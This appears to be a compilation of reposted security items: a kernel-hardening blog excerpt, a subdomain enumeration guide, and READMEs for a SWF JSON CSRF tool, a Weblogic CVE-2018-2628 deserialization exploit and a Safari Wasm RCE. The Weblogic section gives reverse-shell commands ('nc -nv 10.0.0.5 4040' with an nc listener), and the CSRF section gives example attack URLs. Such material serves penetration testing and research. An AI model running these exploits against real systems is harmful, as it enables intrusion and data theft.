Having it on by default would have greatly reduced the impact of things like the BlueBorne attack (CVE-2017-1000251), as fewer systems would have lacked the defense. After spending quite a bit of time fighting with ancient compiler versions (*cough*GCC 4.4.4*cough*), I landed CONFIG_CC_STACKPROTECTOR_AUTO, which defaults to on and tries to use the stack protector if it is available. The implementation of the solution, however, did not please Linus, though he allowed it to be merged. In the future, Kconfig will gain the knowledge to make better decisions, which will let the kernel expose the availability of the (now default) stack protector directly in Kconfig, rather than depending on rather ugly Makefile hacks.

That's it for now; let me know if you think I should add anything! The v4.17 merge window is open.

Edit: added details on ARM register leaks, thanks to Daniel Micay.

© 2018, Kees Cook.

Sursa: https://outflux.net/blog/archives/2018/04/12/security-things-in-linux-v4-16/
-
In our presentation, we will explain how we detected and exploited the vulnerability (covered in this Briefing: https://youtu.be/mYsTBPqbya8) and bypassed the built-in protection mechanisms.

By Maxim Goryachy & Mark Ermolov

Full Abstract & Presentation Materials: https://www.blackhat.com/eu-17/briefi...
-
-
-
-
Purpose

This repository was created to simplify SWF-based JSON CSRF exploitation. It should also work with XML (and any other) data using the optional parameters. It can also be used for easy exploitation of crossdomain.xml misconfigurations (no need to compile a .swf for each case).

Variations of target configuration

The target site has no crossdomain.xml, or a secure crossdomain.xml not allowing domains you can control. In this case you can't read the response from the target site, but you can still conduct CSRF attacks with an arbitrary Content-Type header, if the CSRF protection relies only on the content type (e.g. checking it for being a specific type). In this case usage of the 307 redirect is required to bypass crossdomain.xml (it will be requested only after the CSRF has taken place).

The target site has a misconfigured crossdomain.xml, allowing domains you can control. In this case you can conduct both CSRF and response-reading attacks. Usage of the 307 redirect is not required.

Instructions

The .swf file takes 3 required and 2 optional parameters:

jsonData - apparently, JSON Data:) Can be another type of data if the optional ct param is specified. Can be empty.
php_url - URL of the 307 redirector PHP file. Can be empty (in this case the SWF will request the endpoint without the 307 redirect - and will likely fail if crossdomain.xml is secure or does not exist).
endpoint - target endpoint which is vulnerable to CSRF, or, if you're exploiting an insecure crossdomain.xml, the URL whose response you want to read.
ct (optional) - specify your own Content-Type. Without this parameter it will be application/json.
reqmethod (optional) - specify your own request method. Without this parameter it will be POST.

Place test.swf and test.php on your host, then simply call the SWF file with the correct parameters. (As mentioned by @ziyaxanalbeniz, we actually don't need the crossdomain.xml from this repo if test.php and test.swf are on the same domain; place it on your host only if you are also testing locally or across different domains.)
Example call:

http[s]://[yourhost-and-path]/test.swf?jsonData=[yourJSON]&php_url=http[s]://[yourhost-and-path]/test.php&endpoint=http[s]://[targethost-and-endpoint]

e.g. https://example.com/test.swf?jsonData={"test":1}&php_url=https://example.com/test.php&endpoint=https://sometargethost.com/endpoint

Using the HTML wrapper (read.html) with test.swf (if the browser does not allow a direct connection to the .swf), the parameters are the same:

https://example.com/read.html?jsonData={"test":1}&php_url=https://example.com/test.php&endpoint=https://sometargethost.com/endpoint

In case your target has a crossdomain.xml that is misconfigured or allows your domain, you will also get the response using this wrapper. In this case you can use the wrapper without the 307 redirect (no need for the php_url parameter). This is useful for Chrome >=62, where you can't access the SWF directly, or if you want to exploit an insecure crossdomain.xml.

Note: if you are exploiting an insecure crossdomain.xml and the target site uses https, your origin should also use https for successful response reading.
If you have questions regarding this repository, ping me on Twitter: @h1_sp1d3r

Example cases (CSRF)

Exploit JSON CSRF, POST-based, 307 redirect:
https://example.com/read.html?jsonData={"test":1}&php_url=https://example.com/test.php&endpoint=https://sometargethost.com/endpoint

Exploit XML CSRF, POST-based, 307 redirect:
https://example.com/read.html?jsonData=[xmldata]&php_url=https://example.com/test.php&endpoint=https://sometargethost.com/endpoint&ct=application/xml

Example cases (read responses using insecure crossdomain.xml)

Exploit insecure crossdomain.xml (read data from target), GET-based, no 307 redirect:
https://example.com/read.html?jsonData=&endpoint=https://sometargethost.com/endpoint&reqmethod=GET

Exploit insecure crossdomain.xml (read data from target), POST-based, any content type supported, no 307 redirect:
https://example.com/read.html?jsonData=somedata&endpoint=https://sometargethost.com/endpoint&ct=text/html

Updates

Starting with Chrome 62, a direct link to the SWF file may not work. If this happens, use the HTML wrapper.

01.01.2018 - added HTML wrapper (read.html, should be used with test.swf) for a better experience with Chrome. Usage and parameters are the same as with test.swf. It also supports insecure crossdomain.xml exploitation (able to show the response from the target endpoint).

25.03.2018 - added UI wrapper for a better experience (ui.html + assets folder)

Cross Browser Testing

This project was tested on the following browsers. Notes: ✓ - works, X - doesn't work.

Thanks

Special thanks to @emgeekboy, who inspired me to make this repository and most of its functionality, and @hivarekarpranav, who did the cross-browser and request-method research.
Related blog posts about this:

http://www.geekboy.ninja/blog/exploiting-json-cross-site-request-forgery-csrf-using-flash/
http://research.rootme.in/forging-content-type-header-with-flash/
http://resources.infosecinstitute.com/bypassing-csrf-protections-fun-profit/#gref
https://medium.com/@know.0nix/bypassing-crossdomain-policy-and-hit-hundreds-of-top-alexa-sites-af1944f6bbf5 - thanks to @knowledge_2014, who inspired me to implement the response-reading component

Disclaimer

This repository is made for educational and ethical testing purposes only. Usage for attacking targets without prior mutual consent is illegal. By using this testing tool you accept the fact that any damage (data leak, system compromise, etc.) caused by the use of this tool is your responsibility.

FAQ

Can we read the response from the server?
Answer: no, because of SOP. However, if a crossdomain.xml exists on the target host and is misconfigured - then yes.

Does it work with requests other than GET/POST?
Answer: no.

Is it possible to craft custom headers like X-Requested-With, Origin or Referer?
Answer: no (it was possible in the past, but not now).

Commits, PRs and bug reports are welcome!

Sursa: https://github.com/sp1d3r/swf_json_csrf
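The repo's test.php isn't reproduced in this post; conceptually it only needs to answer every request with a 307, which (unlike a 302) makes the browser replay the same method, body, and Content-Type against the target. A minimal Python stand-in as a sketch (the X-Target header used to pass the destination is my own convention here; the real script presumably takes the endpoint some other way, e.g. as a query parameter):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

class Redirector(BaseHTTPRequestHandler):
    """Answer any GET/POST with 307 Temporary Redirect, so the
    flash-crafted request is replayed verbatim against the destination."""

    def _redirect(self):
        self.send_response(307)
        self.send_header("Location", self.headers.get("X-Target", "/"))
        self.end_headers()

    do_GET = _redirect
    do_POST = _redirect

    def log_message(self, *args):
        pass  # keep the demo quiet

# To run it: HTTPServer(("127.0.0.1", 8307), Redirector).serve_forever()
```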
-
The Connected Car

1. Introduction

Our world is becoming more and more digital, and the devices we use daily are becoming more and more connected. Thinking of IoT products in domotics and healthcare, it's easy to find countless examples of how this interconnectedness improves our quality of life. However, these rapid changes also pose risks. In the big rush forward, we as a society aren't always too concerned with these risks until they manifest themselves. This is where the hacker community has taken an important role in the past decades: using curiosity and skills to demonstrate that changes in the name of progress sometimes have a downside that we need to consider.

Download: https://www.computest.nl/wp-content/uploads/2018/04/connected-car-rapport.pdf
-
Subdomain enumeration

April 21, 2018

A friend recently asked me what methods I use to find subdomains. To be honest I was confused, like "oooohhh so much, brute force mmm… zone transfer and… brute for… wait Google and mmm… many other tools!" What a shame that I was so inaccurate after so much time spent looking for subdomains. Time to dig a little bit! After I wrote a list of the most popular methods, I tried to make a list of some tools and online resources to exploit them. Of course this list is far from exhaustive, there is new stuff every day, but it's still a good start.

Methods

Brute force
The easiest way. Try millions and millions of words as subdomains and check which ones are alive with a forward DNS request.

Zone transfer aka AXFR
Zone transfer is a mechanism that administrators can use to replicate DNS databases, but sometimes the DNS is not well configured and this operation is allowed to anyone, revealing all configured subdomains.

DNS cache snooping
DNS cache snooping is a specific way to query a DNS server in order to check if a record exists in its cache.

Reverse DNS
Try to find the domain name associated with an IP address; it's the opposite of forward DNS.

Alternative names
Once the first round of your recon is finished, apply permutations and transformations (based on another wordlist maybe?) to all discovered subdomains in order to find new ones.

Online DNS tools
There are many websites that allow you to query DNS databases and their history.

SSL Certificates
Request information about all certificates linked to a specific domain, and obtain a list of subdomains covered by these certificates.

Search engines
Search for a specific domain in your favourite search engine, then minus the discovered subdomains one by one: site:example.com -www -dev

Technical tools/search engines
More and more companies host their code online on public platforms; most of the time these services have a search bar.
Text parsing
Parse the HTML code of a website to find new subdomains; this can be applied to every resource of the company, office documents as well.

VHost discovery
Try to find any other subdomain configured on the same web server by brute forcing the Host header.

Tools

Altdns: alternative names brute forcing
Amass: brute force, Google, VirusTotal, alt names
aquatone-discover: Brute force, Riddler, PassiveTotal, Threat Crowd, Google, VirusTotal, Shodan, SSL Certificates, Netcraft, HackerTarget, DNSDB
BiLE-suite: HTML parsing, alt names, reverse DNS
blacksheepwall: AXFR, brute force, reverse DNS, Censys, Yandex, Bing, Shodan, Logontube, SSL Certificates, Virus Total
Bluto: AXFR, netcraft, brute force
brutesubs: enumall, Sublist3r, Altdns
cloudflare_enum: Cloudflare DNS
CTFR: SSL Certificates
DNS-Discovery: brute force
DNS Parallel Prober: DNS resolver
dnscan: AXFR, brute force
dnsrecon: AXFR, brute force, reverse DNS, snoop caching, Google
dnssearch: brute force
domained: Sublist3r, enumall, Knockpy, SubBrute, MassDNS, recon-ng
enumall: recon-ng -> Google, Bing, Baidu, Netcraft, brute force
Fierce: AXFR, brute force, reverse DNS
Knockpy: AXFR, virustotal, brute force
MassDNS: DNS resolver
Second Order: HTML parsing
Sonar: AXFR, brute force
SubBrute: brute force
Sublist3r: Baidu, Yahoo, Google, Bing, Ask, Netcraft, DNSdumpster, VirusTotal, Threat Crowd, SSL Certificates, PassiveDNS
theHarvester: reverse DNS, brute force, Google, Bing, Dogpile, Yahoo, Baidu, Shodan, Exalead
TXDNS: alt names (typo/tld)
vhost-brute: vhost discovery
VHostScan: vhost discovery
virtual-host-discovery: vhost discovery

Online DNS tools

https://hackertarget.com/
http://searchdns.netcraft.com/
https://dnsdumpster.com/
https://www.threatcrowd.org/
https://riddler.io/
https://api.passivetotal.org
https://www.censys.io
https://api.shodan.io
http://www.dnsdb.org/f/
https://www.dnsdb.info/
https://scans.io/
https://findsubdomains.com/
https://securitytrails.com/dns-trails
https://crt.sh/
https://certspotter.com/api/v0/certs?domain=example.com
https://transparencyreport.google.com/https/certificates
https://developers.facebook.com/tools/ct

Search engines

http://www.baidu.com/
http://www.yahoo.com/
http://www.google.com/
http://www.bing.com/
https://www.yandex.ru/
https://www.exalead.com/search/
http://www.dogpile.com/
https://www.zoomeye.org/
https://fofa.so/

Technical tools/search engines

https://github.com/
https://gitlab.com/
https://www.virustotal.com/fr/

DNS cache snooping

nslookup -norecursive domain.com
nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={domain1,domain2,domain3}' <ip>

Other online resources

https://ask.fm/
http://logontube.com/
http://commoncrawl.org/
http://www.sitedossier.com/

Sursa: http://10degres.net/subdomain-enumeration/
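The brute-force method from the top of the post boils down to a forward lookup per candidate word; a minimal sketch (the resolver is a parameter so it can be stubbed below — in real use you would pass nothing and let socket.gethostbyname do the work):

```python
import socket

def brute_subdomains(domain, wordlist, resolve=None):
    """Forward-resolve word.domain for each word; keep the ones that answer."""
    if resolve is None:
        resolve = socket.gethostbyname
    found = []
    for word in wordlist:
        fqdn = "%s.%s" % (word.strip(), domain)
        try:
            found.append((fqdn, resolve(fqdn)))
        except (socket.gaierror, OSError):
            pass  # NXDOMAIN / resolver failure: candidate is dead
    return found

# stubbed resolver standing in for real DNS, so the sketch runs offline
records = {"www.example.com": "93.184.216.34"}
def fake_resolve(host):
    if host not in records:
        raise socket.gaierror("NXDOMAIN")
    return records[host]

alive = brute_subdomains("example.com", ["www", "dev", "mail"], fake_resolve)
```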
-
-
-
-
IMPORTANT: Provided for educational or informational purposes only.

Description

On April 17, 2018, Oracle fixed a deserialization remote command execution vulnerability (CVE-2018-2628) in the Weblogic server WLS Core Components.

Vulnerable versions:

10.3.6.0
12.1.3.0
12.2.1.2
12.2.1.3

Environment

Run the commands below to create a vulnerable Weblogic server (10.3.6.0):

docker pull zhiqzhao/ubuntu_weblogic1036_domain
docker run -d -p 7001:7001 zhiqzhao/ubuntu_weblogic1036_domain

Reproduce Steps

Run the commands below on the JRMPListener host:

wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]

e.g. java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040'

Start a listener on the attacker host:

nc -nlvp 4040

Run the exploit script on the attacker host:

wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]

e.g.
a) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient (using java.rmi.registry.Registry)
b) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient2 (using java.rmi.activation.Activator)

Reference

http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html

Sursa: https://github.com/brianwrf/CVE-2018-2628
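Before the serialized payload goes out, exploit scripts for this bug first complete Weblogic's plain-text T3 handshake on port 7001; the header below matches the widely circulated public PoCs, so treat it as illustrative rather than the exact bytes this repo's exploit.py sends:

```python
def build_t3_handshake(version="12.2.1"):
    """Opening bytes a T3 client sends; a server that speaks T3 replies
    with a HELO line, which is also how scanners fingerprint WebLogic."""
    return ("t3 %s\nAS:255\nHL:19\nMS:10000000\n\n" % version).encode()

probe = build_t3_handshake()
# sock.sendall(probe); then read the response and look for a leading "HELO"
```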
-
CVE-2018-4121 - Safari Wasm Sections POC RCE Exploit by MWR Labs (c) 2018

Details

This proof-of-concept exploit targets Safari 11.0.3 (13604.5.6) on macOS 10.13.3 (17D47) only.

Compile the payload of your choice as a dylib with a constructor.
Run python file_to_jsarray.py your.dylib payload.js
Serve this directory and point Safari to /exploit.html
The exploit is not fully reliable and uses hardcoded offsets for this macOS/Safari version.
The exploit takes a while to run due to the size of the heap spray (24.5GB).
This issue is addressed in macOS 10.13.4 as CVE-2018-4121 (https://support.apple.com/en-gb/HT208692)

Credits

Natalie Silvanovich of Google Project Zero - https://bugs.chromium.org/p/project-zero/issues/detail?id=1522
Ian Beer of Google Project Zero - https://googleprojectzero.blogspot.co.uk/2014/07/pwn4fun-spring-2014-safari-part-i_24.html
Phoenhex - https://phoenhex.re/
Fermin Serna - https://media.blackhat.com/bh-us-12/Briefings/Serna/BH_US_12_Serna_Leak_Era_Slides.pdf

References

https://labs.mwrinfosecurity.com/assets/BlogFiles/apple-safari-wasm-section-vuln-write-up-2018-04-16.pdf
https://labs.mwrinfosecurity.com/mwr-vulnerability-disclosure-policy
https://www.mwrinfosecurity.com/about-us/

Sursa: https://github.com/mwrlabs/CVE-2018-4121
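The file_to_jsarray.py helper isn't shown in the README; a plausible minimal equivalent (the function name and output format here are assumptions, not taken from the repo) just embeds the dylib bytes as a JavaScript typed-array literal for the exploit page:

```python
def file_to_js_array(data, var_name="payload"):
    """Render raw bytes as a JS Uint8Array literal, which is presumably
    what file_to_jsarray.py produces from the dylib (format assumed)."""
    body = ",".join(str(b) for b in data)
    return "var %s = new Uint8Array([%s]);" % (var_name, body)

# first four bytes of a 64-bit Mach-O: MH_MAGIC_64 (0xfeedfacf), little-endian
js = file_to_js_array(b"\xcf\xfa\xed\xfe", "dylib")
```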